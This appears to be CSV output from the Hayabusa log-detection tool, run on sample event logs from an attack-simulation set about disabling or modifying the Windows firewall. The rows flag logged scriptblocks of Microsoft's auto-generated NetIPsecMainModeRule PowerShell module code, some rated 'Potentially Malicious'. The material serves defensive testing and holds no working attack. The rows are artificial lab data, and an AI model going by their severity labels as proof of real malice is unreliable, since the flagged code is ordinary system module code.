$__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 